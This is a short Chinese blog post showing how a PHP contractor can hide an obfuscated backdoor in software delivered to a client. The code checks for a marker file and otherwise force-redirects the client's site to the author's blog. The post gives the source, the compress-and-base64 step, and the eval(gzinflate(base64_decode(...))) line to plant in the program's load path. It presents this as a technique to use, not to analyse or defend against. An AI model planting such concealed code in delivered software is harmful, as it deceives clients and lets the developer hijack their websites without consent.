PHP外包简易加密后门

时间 2020-09-21

标签 php 外包简易加密后门栏目 PHP 繁體版

原文原文链接

首先将后门源代码加密，获得加密后的代码。ide
```
$encode = <<<EOF
if(!file_exists(dirname(dirname(dirname(__FILE__))).'/blog.51cto.com.chinaleo')){
    header('Location:https://blog.51cto.com/chinaleo');
    exit();
}
EOF;
echo base64_encode( gzdeflate( $encode ) );
```
获得字符串“48xM01BMy8xJjU+tyCwuKdZIySzKS8xNxaDj4908fVzj4zU1NfXU9ZMzMvMSc1Lz9ZJy8tP1TA2TS/L1kvNz1TU1q3m5FKAgIzUxJbVIQ90nPzmxJDM/zyqjpKTASl8fVQ/cLHVNa4ReoGtKNCACnLUA”，这就是密文网站

将密文用如下方式放在程序加载的路径上来执行。

eval( gzinflate( base64_decode( '48xM01BMy8xJjU+tyCwuKdZIySzKS8xNxaDj4908fVzj4zU1NfXU9ZMzMvMSc1Lz9ZJy8tP1TA2TS/L1kvNz1TU1q3m5FKAgIzUxJbVIQ90nPzmxJDM/zyqjpKTASl8fVQ/cLHVNa4ReoGtKNCACnLUA' ) ) );

若是用户的文件夹里没有个人网站宣传文件“blog.51cto.com.chinaleo”，则将网站强制跳转到个人博客。